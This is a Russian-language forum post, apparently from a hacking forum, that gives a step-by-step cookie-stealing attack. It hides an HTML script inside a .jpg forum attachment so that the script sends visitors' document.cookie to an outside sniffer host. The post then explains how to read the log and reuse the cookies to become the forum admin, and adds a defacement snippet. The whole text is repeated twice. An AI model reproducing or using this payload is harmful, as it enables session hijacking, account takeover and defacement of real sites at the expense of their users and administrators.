HiMiC
29.01.2007, 21:20
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.
Можно поприкалываться и так:
<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>
После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.
Можно поприкалываться и так:
<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>